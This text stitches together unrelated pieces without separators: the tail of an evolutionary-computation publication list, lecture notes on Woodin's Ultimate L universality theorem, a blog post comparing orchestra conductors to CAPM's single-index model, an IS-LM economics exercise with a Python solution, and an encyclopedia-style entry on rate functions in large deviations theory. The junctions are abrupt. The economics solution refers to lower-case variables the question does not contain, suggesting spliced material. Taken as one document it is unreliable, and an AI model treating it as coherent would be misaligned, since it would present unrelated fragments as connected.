Current and Future Research Trends. Proceedings of the Practical Approaches to Multi-Objective Optimization, 2005 Finding Optimal Addition Chains Using a Genetic Algorithm Approach. Proceedings of the Computational Intelligence and Security, International Conference, 2005 A study of fitness inheritance and approximation techniques for multi-objective particle swarm optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2005 Identifying on-line behavior and some sources of difficulty in two competitive approaches for constrained optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2005 MRMOGA: parallel evolutionary multiobjective optimization using multiple resolutions. Proceedings of the IEEE Congress on Evolutionary Computation, 2005 Use of Multiobjective Optimization Concepts to Handle Constraints in Genetic Algorithms. Proceedings of the Evolutionary Multiobjective Optimization, 2005 Recent Trends in Evolutionary Multiobjective Optimization. Proceedings of the Evolutionary Multiobjective Optimization, 2005 2004 Handling Multiple Objectives With Particle Swarm Optimization. IEEE Trans. Evol. Comput., 2004 Simple Feasibility Rules and Differential Evolution for Constrained Optimization. 
Proceedings of the MICAI 2004: Advances in Artificial Intelligence, 2004 A Study of the Parallelization of a Coevolutionary Multi-objective Evolutionary Algorithm. Proceedings of the MICAI 2004: Advances in Artificial Intelligence, 2004 Convergence Analysis of a Multiobjective Artificial Immune System Algorithm. Proceedings of the Artificial Immune Systems, Third International Conference, 2004 Particle Swarm Optimization in Non-stationary Environments. Proceedings of the Advances in Artificial Intelligence, 2004 On the Optimal Computaion of Finite Field Exponentiation. Proceedings of the Advances in Artificial Intelligence, 2004 A Cultural Algorithm with Differential Evolution to Solve Constrained Optimization Problems. Proceedings of the Advances in Artificial Intelligence, 2004 Using Clustering Techniques to Improve the Performance of a Multi-objective Particle Swarm Optimizer. Proceedings of the Genetic and Evolutionary Computation, 2004 An Improved Diversity Mechanism for Solving Constrained Optimization Problems Using a Multimembered Evolution Strategy. Proceedings of the Genetic and Evolutionary Computation, 2004 Reusing Code in Genetic Programming. Proceedings of the Genetic Programming, 7th European Conference, 2004 Culturizing Differential Evolution for Constrained Optimization. Proceedings of the 5th Mexican International Conference on Computer Science (ENC 2004), 2004 On the Use of a Population-Based Particle Swarm Optimizer to Design Combinational Logic Circuits. Proceedings of the 6th NASA / DoD Workshop on Evolvable Hardware (EH 2004), 2004 A Comparative Study of Encodings to Design Combinational Logic Circuits Using Particle Swarm Optimization. Proceedings of the 6th NASA / DoD Workshop on Evolvable Hardware (EH 2004), 2004 Evolutionary Multiobjective Design targeting a Field Programmable Transistor Array. Proceedings of the 6th NASA / DoD Workshop on Evolvable Hardware (EH 2004), 2004 A constraint-handling mechanism for particle swarm optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2004 PASSSS: an implementation of a novel diversity strategy for handling constraints. Proceedings of the IEEE Congress on Evolutionary Computation, 2004 Mutual information-based fitness functions for evolutionary circuit synthesis. Proceedings of the IEEE Congress on Evolutionary Computation, 2004 2003 Guest editorial: special issue on evolutionary multiobjective optimization. IEEE Trans. Evol. Comput., 2003 Evolutionary Synthesis of Logic Circuits Using Information Theory. Artif. Intell. Rev., 2003 Evolutionary multiobjective optimization using a cultural algorithm. Proceedings of the 2003 IEEE Swarm Intelligence Symposium, 2003 Engineering Optimization Using a Simple Evolutionary Algorithm. Proceedings of the 15th IEEE International Conference on Tools with Artificial Intelligence (ICTAI 2003), 2003 Use of Particle Swarm Optimization to Design Combinational Logic Circuits. Proceedings of the Evolvable Systems: From Biology to Hardware, 2003 Synthesis of Boolean Functions Using Information Theory. Proceedings of the Evolvable Systems: From Biology to Hardware, 2003 Use of an Artificial Immune System for Job Shop Scheduling. Proceedings of the Artificial Immune Systems, Second International Conference, 2003 A Simple Evolution Strategy to Solve Constrained Optimization Problems. Proceedings of the Genetic and Evolutionary Computation, 2003 Multiobjective Optimization Using Ideas from the Clonal Selection Principle. 
Proceedings of the Genetic and Evolutionary Computation, 2003 Use of Multiobjective Optimization Concepts to Handle Constraints in Single-Objective Optimization. Proceedings of the Genetic and Evolutionary Computation, 2003 Multiobjective-Based Concepts to Handle Constraints in Evolutionary Algorithms. Proceedings of the 4th Mexican International Conference on Computer Science (ENC 2003), 2003 IS-PAES: Evolutionary Multi-Objective Optimization with Constraint Handling. Proceedings of the 4th Mexican International Conference on Computer Science (ENC 2003), 2003 Gate-level Synthesis of Boolean Functions using Information Theory Concepts. Proceedings of the 4th Mexican International Conference on Computer Science (ENC 2003), 2003 The Micro Genetic Algorithm 2: Towards Online Adaptation in Evolutionary Multiobjective Optimization. Proceedings of the Evolutionary Multi-Criterion Optimization, 2003 IS-PAES: A Constraint-Handling Technique Based on Multiobjective Optimization Concepts. Proceedings of the Evolutionary Multi-Criterion Optimization, 2003 Comparing Different Serial and Parallel Heuristics to Design Combinational Logic Circuits. Proceedings of the 5th NASA / DoD Workshop on Evolvable Hardware (EH 2003), 2003 Fitness Landscape and Evolutionary Boolean Synthesis using Information. Proceedings of the 5th NASA / DoD Workshop on Evolvable Hardware (EH 2003), 2003 Adding a diversity mechanism to a simple evolution strategy to solve constrained optimization problems. Proceedings of the IEEE Congress on Evolutionary Computation, CEC 2003, 8, 2003 A coevolutionary multi-objective evolutionary algorithm. Proceedings of the IEEE Congress on Evolutionary Computation, CEC 2003, 8, 2003 2002 Design of combinational logic circuits through an evolutionary multiobjective optimization approach. AI EDAM, 2002 Constraint-handling in genetic algorithms through the use of dominance-based tournament selection. Robust Multiscale Affine 2D-Image Registration through Evolutionary Strategies. Proceedings of the Parallel Problem Solving from Nature, 2002 Genetic Algorithms and Case-Based Reasoning as a Discovery and Learning Machine in the Optimization of Combinational Logic Circuits. Proceedings of the MICAI 2002: Advances in Artificial Intelligence, 2002 A Cultural Algorithm for Constrained Optimization. Proceedings of the MICAI 2002: Advances in Artificial Intelligence, 2002 Efficient Affine 2D-image Registration Using Evolutionary Strategies. Proceedings of the GECCO 2002: Proceedings of the Genetic and Evolutionary Computation Conference, 2002 Adding Knowledge And Efficient Data Structures To Evolutionary Programming: A Cultural Algorithm For Constrained Optimization. Proceedings of the GECCO 2002: Proceedings of the Genetic and Evolutionary Computation Conference, 2002 Evolutionary algorithms for solving multi-objective problems. Genetic algorithms and evolutionary computation 5, Kluwer, ISBN: 978-1-4757-5184-0, 2002 2001 Extraction of Design Patterns from Evolutionary Algorithms Using Case-Based Reasoning. Proceedings of the Evolvable Systems: From Biology to Hardware, 2001 GA-Based Learning of kDNF<sub>n</sub><sup>s</sup> Boolean Formulas. Proceedings of the Evolvable Systems: From Biology to Hardware, 2001 A Micro-Genetic Algorithm for Multiobjective Optimization. Proceedings of the Evolutionary Multi-Criterion Optimization, 2001 A Short Tutorial on Evolutionary Multiobjective Optimization. 
Proceedings of the Evolutionary Multi-Criterion Optimization, 2001 On Learning kDNF<sup>s</sup><sub>n</sub> Boolean Formulas. Proceedings of the 3rd NASA / DoD Workshop on Evolvable Hardware (EH 2001), 2001 2000 An updated survey of GA-based multiobjective optimization techniques. ACM Comput. Surv., 2000 Towards automated evolutionary design of combinational circuits. Comput. Electr. Eng., 2000 Ant Colony System for the Design of Combinational Logic Circuits. Proceedings of the Evolvable Systems: From Biology to Hardware, 2000 Evolutionary Multiobjective Design of Combinational Logic Circuits. Proceedings of the 2nd NASA / DoD Workshop on Evolvable Hardware (EH 2000), 2000 1999 A Comprehensive Survey of Evolutionary-Based Multiobjective Optimization Techniques. Knowl. Inf. Syst., 1999 A Genetic Programming Approach to Logic Function Synthesis by Means of Multiplexers. Proceedings of the 1st NASA / DoD Workshop on Evolvable Hardware (EH '99), 1999 1998 Using a new GA-based multiobjective optimization technique for the design of robot arms. Robotica, 1998 Using the Min-Max Method to Solve Multiobjective Optimization Problems with Genetic Algorithms. Proceedings of the Progress in Artificial Intelligence, 1998 1997 Automated Design of Combinational Logic Circuits by Genetic Algorithms. Proceedings of the International Conference on Artificial Neural Nets and Genetic Algorithms, 1997 1996 Automated design of part feeders using a genetic algorithm. Proceedings of the 1996 IEEE International Conference on Robotics and Automation, 1996 1995 Multiobjective design optimization of counterweight balancing of a robot arm using genetic algorithms. Proceedings of the Seventh International Conference on Tools with Artificial Intelligence, 1995 Using Genetic Algorithms for Optimal Design of Axially Loaded Non-Prismatic Columns. Proceedings of the Artificial Neural Nets and Genetic Algorithms, 1995 1994 Using Genetic Algorithms for Optimal Design of Trusses. Proceedings of the Sixth International Conference on Tools with Artificial Intelligence, 1994
## Luminy – Hugh Woodin: Ultimate L (II)

For the first lecture, see here.

II. In this lecture, we prove:

Universality Theorem. If $N$ is a weak extender model for ‘$\delta$ is supercompact’, and $\pi:N\cap V_{\gamma+1}\to N\cap V_{\pi(\gamma)+1}$ is elementary with ${\rm cp}(\pi)\ge\delta$, then $\pi\in N$.

As mentioned before, this gives us that $N$ absorbs a significant amount of strength from $V$. For example:

Lemma. Suppose that $\kappa$ is 2-huge. Then, for each $A\subseteq V_\kappa$, $(V_\kappa,\in,A)\models$ “There is a proper class of huge cardinals witnessed by embeddings that cohere $A$.” $\Box$

Hence, if $A=N\cap V_\kappa$ and $\kappa>\delta$, then $N\cap V_\kappa\models$ “There is a proper class of huge cardinals.”

Here, coherence means the following: $j:V\to M$ coheres a set $A$ iff, letting $\gamma={\rm cp}(j)$, we have $V_{j(j(\gamma))+\omega}\subseteq M$ and $j(A)\cap V_{j(j(\gamma))+\omega}=A\cap V_{j(j(\gamma))+\omega}$. Actually, we need much less: we need something like $j''j(\gamma)\in M$, and for hugeness, $V_{j(j(\gamma))+1}\subseteq M$ already suffices.

This methodology breaks down past $\omega$-hugeness. Then we need to change the notion of coherence, since (for example, beginning with $j:L(V_\lambda)\to L(V_\lambda)$) to have $\pi:N\cap V_{\lambda+1}\to N\cap V_{\pi(\lambda)+1}$ is no longer a reasonable condition. But suitable modifications still work at this very high level.

The proof of the universality theorem builds on a reformulation of supercompactness in terms of extenders, due to Magidor:

Theorem (Magidor). The following are equivalent:

1. $\delta$ is supercompact.
2. For all $\gamma>\delta$ and all $a\in V_\gamma$, there are $\bar\delta<\bar\gamma<\delta$ and $\bar a\in V_{\bar\gamma}$, and an elementary $\pi:V_{\bar\gamma+1}\to V_{\gamma+1}$ such that:
   1. $\bar\delta={\rm cp}(\pi)$ and $\pi(\bar\delta)=\delta$.
   2. $\pi(\bar\gamma)=\gamma$ and $\pi(\bar a)=a$.

The proof is actually a straightforward reflection argument.

Proof. $(1.\Rightarrow 2.)$ Suppose that item 2. fails, as witnessed by $\gamma,a$. Pick a normal fine ${\mathcal U}$ on ${\mathcal P}_\delta(\lambda)$ where $\lambda=|V_{\gamma+1}|$, and consider $j:V\to M\cong V^{{\mathcal P}_\delta(\lambda)}/{\mathcal U}$. Then ${\rm cp}(j)=\delta$, $j(\delta)>\lambda$, and ${}^\lambda M\subseteq M$. But then ${}^{V_{\gamma+1}}M\subseteq M$, and, by elementarity, $j(\gamma),j(a)$ are counterexamples to item 2. in $M$ with respect to $j(\delta)$. However, $j\upharpoonright V_{\gamma+1}\in M$, and it witnesses item 2. in $M$ for $j(\gamma),j(a)$ with respect to $j(\delta)$. Contradiction.

$(2.\Rightarrow 1.)$ Assume item 2. For any $\lambda>\delta$ we need to find a normal fine ${\mathcal U}$ on ${\mathcal P}_\delta(\lambda)$. Fix $\lambda$, and let $\gamma=\lambda+\omega$ and $a=\lambda$. Let $\pi:V_{\bar\gamma+1}\to V_{\gamma+1}$ be an embedding as in item 2. for $\gamma,a$. Use $\pi$ to define a normal fine $\bar{\mathcal U}$ on ${\mathcal P}_{\bar\delta}(\bar\lambda)$ by $A\in\bar{\mathcal U}$ iff $\pi''\bar\lambda\in\pi(A)$. Note that $\pi''\bar\lambda\in V_{\lambda+1}\in V_{\gamma+1}$, so this definition makes sense. Further, $\bar{\mathcal U}\subseteq{\mathcal P}({\mathcal P}_{\bar\delta}(\bar\lambda))\subseteq V_{\bar\lambda+2}$, so $\bar{\mathcal U}\in V_{\bar\lambda+3}\subseteq V_{\bar\gamma+1}$. Hence, $\bar{\mathcal U}$ is in the domain of $\pi$, and $\pi(\bar{\mathcal U})={\mathcal U}$ is as wanted.
$\Box$

As mentioned in the previous lecture, it was expected for a while that Magidor’s reformulation would be the key to the construction of inner models for supercompactness, since it suggests which extenders need to be put in their sequence. Recent results indicate now that the construction should instead proceed directly with extenders derived from the normal fine measures. However, Magidor’s reformulation is very useful for the theory of weak extender models, thanks to the following fact, which can be seen as a strengthening of this reformulation:

Lemma. Suppose $N$ is a weak extender model for ‘$\delta$ is supercompact’. Suppose $\gamma>\delta$ and $a\in V_\gamma$. Then there are $\bar\delta,\bar a,\bar\gamma$ in $V_{\delta}$ and an elementary $\pi:V_{\bar\gamma+1}\to V_{\gamma+1}$ such that:

1. ${\rm cp}(\pi)=\bar\delta$, $\pi(\bar\delta)=\delta$, $\pi(\bar\gamma)=\gamma$, and $\pi(\bar a)=a$.
2. $\pi(N\cap V_{\bar\gamma})=N\cap V_\gamma$.
3. $\pi\upharpoonright(N\cap V_{\bar\gamma+1})\in N$.

Again, the proof is a reflection argument as in Magidor’s theorem, but we need to work harder to ensure items 2. and 3. The key is:

Claim. Suppose $\lambda>\delta$. Then there is a normal fine ${\mathcal U}$ on ${\mathcal P}_\delta(V_\lambda)$ such that $\{X\in{\mathcal P}_\delta(V_\lambda)\mid$ the transitive collapse of $X\cap N$ is $N\cap V_{\bar\lambda}$, where $\bar\lambda$ is the transitive collapse of $X\cap\lambda\}\in{\mathcal U}$.

Proof. We may assume that $|V_\lambda|=\lambda$ and that this also holds in $N$. In $N$, pick a bijection $\rho$ between $\lambda$ and $N\cap V_\lambda$, and find a normal fine ${\mathcal U}^*$ on ${\mathcal P}_\delta(\lambda)$ with ${\mathcal U}^*\cap N\in N$ and ${\mathcal P}_\delta(\lambda)\cap N\in{\mathcal U}^*$. It is enough to check

$(*)$ $\{X\in{\mathcal P}_\delta(\lambda)\mid$ the transitive collapse of $\rho[X]$ is a rank initial segment of $N\}\in{\mathcal U}^*$.

Once we have $(*)$, it is easy to use the bijection between $\lambda$ and $V_\lambda$ to obtain the desired measure ${\mathcal U}$. To prove $(*)$, work in $N$, and note that the result is now trivial since, letting $j$ be the ultrapower embedding induced by the restriction of ${\mathcal U}^*$ to $N$, we have that $j''(N\cap V_\lambda)$ collapses to $N\cap V_\lambda$, which is a rank initial segment of $N$. $\Box$

Proof of the lemma. The argument is now a straightforward elaboration of the proof of Magidor’s theorem, using the claim just established. Namely, in the proof of $(1.\Rightarrow2.)$ of the Theorem, use an ultrafilter ${\mathcal U}$ as in the claim. We need to see that (the restriction to $V_{\gamma+1}$ of) the ultrapower embedding $j$ satisfies $j(N\cap V_{\bar\gamma})=N\cap V_\gamma$.

We begin with $\lambda$ much larger than $\gamma$ such that $\lambda=|V_\lambda|$, and fix sets $A,B\in N\cap{\mathcal P}(\lambda)$ such that $|A|=|B|=\lambda$, and a bijection $\rho:\lambda\to V_\lambda$ such that $\rho\upharpoonright A$ is a bijection between $A$ and $N\cap V_\lambda$ and $\rho\upharpoonright A\in N$. We use $\rho$ to transfer ${\mathcal U}$ to a measure ${\mathcal U}^*$ on ${\mathcal P}_\delta(A)$ concentrating on $N$. Now let $j:V\to M\cong V^{{\mathcal P}_\delta(A)}/{\mathcal U}^*$ be the ultrapower embedding. We need to check that $j(N)\cap V_\lambda=N\cap V_\lambda$. The issue is that, in principle, $j(N)\cap V_\lambda$ could overspill and be larger.
However, since ${\mathcal U}^*$ concentrates on $N$, this is not possible, because transitive collapses are computed the same way in $M$, $N$, and $V$, even though $(N^{{\mathcal P}_\delta(A)}/{\mathcal U}^*)^N$ may differ from $(N^{{\mathcal P}_\delta(A)}/{\mathcal U}^*)^V$. $\Box$

We are ready for the main result of this lecture.

Proof of the Universality Theorem. We will actually prove that for all cardinals $\gamma>\delta$, if $\pi:(H(\gamma^+))^N\to(H(\pi(\gamma)^+))^N$ is elementary, and ${\rm cp}(\pi)\ge\delta$, then $\pi\in N$. This gives the result as stated, through some coding.

Choose $\lambda$ much larger than $\gamma$, and let $a=(\pi,\gamma)$. Apply the strengthened Magidor reformulation, to obtain $\bar a=(\bar\pi,\bar\gamma)$, $\bar\lambda$ and $\bar\delta$, and an embedding $\sigma:V_{\bar\lambda+1}\to V_{\lambda+1}$ with ${\rm cp}(\sigma)=\bar\delta$, $\sigma(\bar\delta)=\delta$, $\sigma(\bar\pi)=\pi$, and $\sigma(\bar\gamma)=\gamma$. Note that $\bar\pi: H(\bar\gamma^+)^N\to H(\bar \pi(\bar \gamma)^+)^N$.

It is enough to show that $\bar\pi\in N$, since $\sigma\upharpoonright (V_{\bar\lambda+1}\cap N)\in N$, and so $\pi=\sigma(\bar\pi)\in N$ as well. For this, we actually only need to show that $\bar\pi\upharpoonright({\mathcal P}(\bar\gamma)\cap N)\in N$, since in general the fragment $\pi\upharpoonright({\mathcal P}(\gamma)\cap N)$ of such an embedding $\pi$ determines $\pi$ completely. The advantage, of course, is that it is easier to analyze sets of ordinals.

Let $a\subseteq\bar\gamma$ with $a \in N$, and let $\alpha\in\bar\pi(\bar\gamma)$. We need to compute in $N$ whether $\alpha\in\bar\pi(a)$. For this, note that $\alpha\in\bar\pi(a)$ iff $\sigma(\alpha)\in\sigma(\bar\pi(a))$. Now, $\sigma(\bar\pi)=\pi$, so this reduces to $\sigma(\alpha)\in\pi(\sigma(a))$, i.e., to compute $\bar\pi$, it suffices to know $\pi\upharpoonright{\rm ran}(\sigma)$.

Recall that $\sigma\upharpoonright (N\cap V_{\bar\lambda+1})\in N$, and consider $\sigma_0=\sigma\upharpoonright H(\bar\gamma^+)^N$. Note that $\sigma_0\in H(\gamma^+)^N$, and $\sigma_0:H(\bar\gamma^+)^N\to H(\gamma^+)^N$. Applying $\pi$ to $\sigma_0$, and using elementarity, we have $\pi(\sigma_0):\pi(H(\bar\gamma^+)^N)\to\pi(H(\gamma^+)^N)$. But $\pi(H(\bar\gamma^+)^N)=H(\bar\gamma^+)^N$, because ${\rm cp}(\pi)\ge\delta$, while $\pi(H(\gamma^+)^N)=H(\pi(\gamma)^+)^N$. It follows that $\pi(\sigma(a))=\pi(\sigma_0)(\pi(a))=\pi(\sigma_0)(a)$, where the last equality holds because $a\subseteq\bar\gamma<\delta\le{\rm cp}(\pi)$, so $\pi(a)=a$. Since $\sigma_0\in {\rm dom}(\pi)$, we have $\pi(\sigma_0)\in N$ (simply note the range of $\pi$), and we are done, because we have reduced the question of whether $\alpha\in\bar \pi(a)$ to the question of whether $\sigma(\alpha)\in\pi(\sigma_0)(a)$, which $N$ can determine. $\Box$

Note how the Universality Theorem suggests that the construction of $L[\vec E]$ models for supercompactness using Magidor’s reformulation runs into difficulties; namely, if $\delta$ is supercompact, we have many extenders $F$ with critical point $\kappa_F<\delta$ and $\pi_F(\kappa_F)=\delta$, and we are now producing new extenders above $\delta$, which should somehow also be accounted for in $\vec E$.

A nice application of universality is the dichotomy theorem for ${\sf HOD}$ mentioned at the end of last lecture. If ${\sf HOD}$ is a weak extender model for supercompactness, we obtain the following:

Corollary. There is no sequence of (non-trivial) elementary embeddings ${\sf HOD}\to_{j_0}{\sf HOD}\to_{j_1}{\sf HOD}\to_{j_2}\dots$ with well-founded limit.
$\Box$

It follows that there is a $\Sigma_2$-definable ordinal such that any elementary embedding $j:{\sf HOD}\to{\sf HOD}$ fixing this ordinal is the identity! This is because ${\sf HOD}=L[T]$, where $T$ is the $\Sigma_2$-theory in $V$ of the ordinals. In particular, there is no non-trivial $j:({\sf HOD},T)\to({\sf HOD},T)$. Note that the corollary and this fact fail if ${\sf HOD}$ is replaced by an arbitrary weak extender model.

The question of whether there can actually be non-trivial elementary embeddings $j:{\sf HOD}\to{\sf HOD}$ is, in a sense, still open: its consistency has currently only been established from the assumption in ${\sf ZF}$ that there are very strong versions of Reinhardt cardinals, i.e., strong versions of embeddings $j:V\to V$, the consistency of which is in itself problematic. (On the other hand, Hugh has shown that there are no embeddings $j:V\to{\sf HOD}$, and this can be established by an easy variant of Hugh’s proof of Kunen’s theorem as presented, for example, in Kanamori’s book (Second proof of Theorem 23.12).)
## Conductors and CAPM

For a long time I used to wonder why orchestras have conductors. I possibly first noticed the presence of the conductor sometime in the 1990s when Zubin Mehta was in the news. And then I always wondered why this person, who didn’t play anything but stood there waving a stick, needed to exist. Couldn’t the orchestra coordinate itself like rockstars or practitioners of Indian music forms do?

And then I came across this video a year or two back. And then the computer science training I’d gone through two decades back kicked in – the job of an orchestra conductor is to reduce an $O(n^2)$ problem to an $O(n)$ problem.

For a group of musicians to make music, they need to coordinate with each other. Yes, they have the staff notation and all that, but still they need to know when to speed up or slow down, when to make what transitions, etc. They may have practiced together, but the professional performance needs to be flawless. And so they need to constantly take cues from each other.

When you have $n$ musicians who need to coordinate, you have $\frac{n(n-1)}{2}$ pairs of people who need to coordinate. When $n$ is small, this is trivial, and so you see that small ensembles or rock bands can easily coordinate. However, as $n$ gets large, $n^2$ grows well-at-a-faster-rate. And that is a problem, and a risk.

Enter the conductor. Rather than taking cues from one another, the musicians now simply need to take cues from this one person. And so there are now only $n$ pairs that need to coordinate – each musician in the band with the conductor. Or an $O(n^2)$ problem has become an $O(n)$ problem!

For whatever reason, while I was thinking about this yesterday, I got reminded of legendary finance professor R Vaidya’s class on the capital asset pricing model (CAPM), or as he put it the “Sharpe single index model” (surprisingly, all the links I find for this are from Indian test prep sites, so not linking). We had just learnt portfolio theory, and how using the expected returns, variances and correlations between a set of securities we could construct an “efficient frontier” of securities that could give us the best risk-adjusted return. Seemed very mathematically elegant, except that in case you needed to construct a portfolio of $n$ stocks, you needed $n^2$ correlations. In other words, an $O(n^2)$ problem.

And then Vaidya introduced CAPM, which magically reduced the problem to an $O(n)$ problem. By suddenly introducing the concept of an index, all that mattered for each stock now was its beta – the coefficient relating its returns to the index returns. You didn’t need to care about how stocks reacted with each other any more – all you needed was the relationship with the index.

In a sense, if you think about it, the index in CAPM is like the conductor of an orchestra. If only all $O(n^2)$ problems could be reduced to $O(n)$ problems this elegantly!
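To put rough numbers on the parameter counting, here is a small Python sketch; the portfolio size, the simulated returns and the helper names are all illustrative assumptions of mine, not anything from the class or the CAPM literature:

```python
# Parameter counting: full Markowitz input vs. the Sharpe single-index (CAPM-style) model.
import numpy as np

def n_pairwise_correlations(n: int) -> int:
    """Every pair of securities needs its own correlation estimate: n(n-1)/2 of them."""
    return n * (n - 1) // 2

def single_index_betas(stock_returns: np.ndarray, index_returns: np.ndarray) -> np.ndarray:
    """One beta per stock: the OLS slope of each stock's returns on the index returns."""
    x = index_returns - index_returns.mean()
    return np.array([np.dot(r - r.mean(), x) / np.dot(x, x) for r in stock_returns])

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    n_stocks, n_days = 50, 250                       # illustrative sizes only
    index = rng.normal(0.0005, 0.01, n_days)         # made-up daily index returns
    true_betas = rng.uniform(0.5, 1.5, n_stocks)
    stocks = true_betas[:, None] * index + rng.normal(0, 0.02, (n_stocks, n_days))

    print("pairwise correlations needed:", n_pairwise_correlations(n_stocks))  # 1225, O(n^2)
    print("betas needed:", len(single_index_betas(stocks, index)))             # 50, O(n)
```

With 50 stocks, that is 1,225 pairwise correlations for the full Markowitz input versus 50 betas (plus the index variance) for the single-index model.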
# Question

Assume the following equations summarize the structure of an economy:

- C = Ca + 0.85(Y - T)
- Ca = 260 - 10r
- T = 200 + 0.2Y
- (M/P)^d = 0.25Y - 25r
- M^s/P = 2125
- Ip = 1500 - 30r
- G = 1700
- NX = 500 - 0.08Y

A) Compute the value of the multiplier.
B) Derive the equation for the autonomous planned spending schedule, Ap.
C) Derive the equation for the IS curve.
D) Calculate the slope of the IS curve, the change in r divided by the change in Y. (Hint: use the equation of the IS curve to compute the change in Y divided by the change in r, then use the fact that the slope of the IS curve, change in r / change in Y, is the inverse of change in Y / change in r.)
E) Derive the equation for the LM curve.
F) Calculate the slope of the LM curve, the change in r divided by the change in Y. (To do this, use the same hint as in part D.)
G) Compute the equilibrium interest rate (r).
H) Compute the equilibrium real output (Y).
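Assuming the lower-case y and p in the question denote the same variables as Y and P (which seems to be the intent), one way to work through parts A) to H) is to collapse everything into the IS and LM relations and solve them together. The following Python sketch does exactly that, with variable names of my own choosing:

```python
# IS-LM algebra for the model above.
# Assumption: the question's lower-case y and p are the same variables as Y and P.

mpc, tax_rate, import_rate = 0.85, 0.2, 0.08   # from the C, T and NX equations
Ca0, Ca_r = 260.0, 10.0                        # Ca = 260 - 10r
T0 = 200.0                                     # T  = 200 + 0.2Y
Ip0, Ip_r = 1500.0, 30.0                       # Ip = 1500 - 30r
G, NX0 = 1700.0, 500.0                         # NX = 500 - 0.08Y
money_supply, L_y, L_r = 2125.0, 0.25, 25.0    # (M/P)^d = 0.25Y - 25r, M^s/P = 2125

# (A) Multiplier: 1 / (1 - mpc*(1 - tax_rate) + import_rate).
k = 1.0 / (1.0 - mpc * (1.0 - tax_rate) + import_rate)             # 2.5

# (B) Autonomous planned spending: the part of planned expenditure not depending on Y.
Ap0 = Ca0 - mpc * T0 + Ip0 + G + NX0                               # 3790
Ap_r = Ca_r + Ip_r                                                 # Ap = 3790 - 40r

# (C)/(D) IS curve: Y = k*Ap = k*Ap0 - k*Ap_r*r, i.e. Y = 9475 - 100r.
def is_Y(r): return k * (Ap0 - Ap_r * r)
is_slope_dr_dY = -1.0 / (k * Ap_r)                                 # -0.01

# (E)/(F) LM curve: 0.25Y - 25r = 2125, i.e. Y = 8500 + 100r.
def lm_Y(r): return (money_supply + L_r * r) / L_y
lm_slope_dr_dY = L_y / L_r                                         # 0.01

# (G)/(H) Equilibrium: set the IS and LM expressions for Y equal and solve for r, then Y.
r_star = (k * Ap0 - money_supply / L_y) / (k * Ap_r + L_r / L_y)   # 4.875
Y_star = lm_Y(r_star)                                              # 8987.5

print(f"multiplier = {k}, Ap = {Ap0} - {Ap_r}r")
print(f"IS: Y = {k*Ap0} - {k*Ap_r}r   LM: Y = {money_supply/L_y} + {L_r/L_y}r")
print(f"IS slope dr/dY = {is_slope_dr_dY}, LM slope dr/dY = {lm_slope_dr_dY}")
print(f"equilibrium: r = {r_star}, Y = {Y_star}")
```

Under that reading, the multiplier is 2.5, Ap = 3790 - 40r, the IS curve is Y = 9475 - 100r (slope -0.01), the LM curve is Y = 8500 + 100r (slope 0.01), and the equilibrium is r = 4.875 with Y = 8987.5.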
# Rate function

In mathematics — specifically, in large deviations theory — a rate function is a function used to quantify the probabilities of rare events. It is required to have several properties which assist in the formulation of the large deviation principle. In some sense, the large deviation principle is an analogue of weak convergence of probability measures, but one which takes account of how well the rare events behave. A rate function is also called a Cramér function, after the Swedish probabilist Harald Cramér.

## Definitions

An extended real-valued function I : X → [0, +∞] defined on a Hausdorff topological space X is said to be a rate function if it is not identically +∞ and is lower semi-continuous, i.e. all the sub-level sets $\{ x \in X \mid I(x) \leq c \} \mbox{ for } c \geq 0$ are closed in X. If, furthermore, they are compact, then I is said to be a good rate function.

A family of probability measures $(\mu_\delta)_{\delta>0}$ on X is said to satisfy the large deviation principle with rate function I : X → [0, +∞) (and rate $1/\delta$) if, for every closed set F ⊆ X and every open set G ⊆ X,

$\limsup_{\delta \downarrow 0} \delta \log \mu_{\delta} (F) \leq - \inf_{x \in F} I(x), \quad \mbox{(U)}$

$\liminf_{\delta \downarrow 0} \delta \log \mu_{\delta} (G) \geq - \inf_{x \in G} I(x). \quad \mbox{(L)}$

If the upper bound (U) holds only for compact (instead of closed) sets F, then $(\mu_\delta)_{\delta>0}$ is said to satisfy the weak large deviation principle (with rate $1/\delta$ and weak rate function I).

### Remarks

The role of the open and closed sets in the large deviation principle is similar to their role in the weak convergence of probability measures: recall that $(\mu_\delta)_{\delta>0}$ is said to converge weakly to μ if, for every closed set F ⊆ X and every open set G ⊆ X,

$\limsup_{\delta \downarrow 0} \mu_{\delta} (F) \leq \mu(F),$

$\liminf_{\delta \downarrow 0} \mu_{\delta} (G) \geq \mu(G).$

There is some variation in the nomenclature used in the literature: for example, den Hollander (2000) uses simply "rate function" where this article — following Dembo & Zeitouni (1998) — uses "good rate function", and "weak rate function". Fortunately, regardless of the nomenclature used for rate functions, examination of whether the upper bound inequality (U) is supposed to hold for closed or compact sets tells one whether the large deviation principle in use is strong or weak.

## Properties

### Uniqueness

A natural question to ask, given the somewhat abstract setting of the general framework above, is whether the rate function is unique. This turns out to be the case: given a sequence of probability measures $(\mu_\delta)_{\delta>0}$ on X satisfying the large deviation principle for two rate functions I and J, it follows that I(x) = J(x) for all x ∈ X.

### Exponential tightness

It is possible to convert a weak large deviation principle into a strong one if the measures converge sufficiently quickly. If the upper bound holds for compact sets F and the sequence of measures $(\mu_\delta)_{\delta>0}$ is exponentially tight, then the upper bound also holds for closed sets F. In other words, exponential tightness enables one to convert a weak large deviation principle into a strong one.

### Continuity

Naïvely, one might try to replace the two inequalities (U) and (L) by the single requirement that, for all Borel sets S ⊆ X,

$\lim_{\delta \downarrow 0} \delta \log \mu_{\delta} (S) = - \inf_{x \in S} I(x). \quad \mbox{(E)}$

Unfortunately, the equality (E) is far too restrictive, since many interesting examples satisfy (U) and (L) but not (E).
For example, the measure $\mu_\delta$ might be non-atomic for all δ, so the equality (E) could hold for S = {x} only if I were identically +∞, which is not permitted in the definition. However, the inequalities (U) and (L) do imply the equality (E) for so-called I-continuous sets S ⊆ X, those for which

$I \big( \stackrel{\circ}{S} \big) = I \big( \bar{S} \big),$

where $\stackrel{\circ}{S}$ and $\bar{S}$ denote the interior and closure of S in X respectively. In many examples, many sets/events of interest are I-continuous. For example, if I is a continuous function, then all sets S such that

$S \subseteq \bar{\stackrel{\circ}{S}}$

are I-continuous; all open sets, for example, satisfy this containment.

### Transformation of large deviation principles

Given a large deviation principle on one space, it is often of interest to be able to construct a large deviation principle on another space. There are several results in this area; for example, the contraction principle transfers a large deviation principle from one space to another along a continuous function.

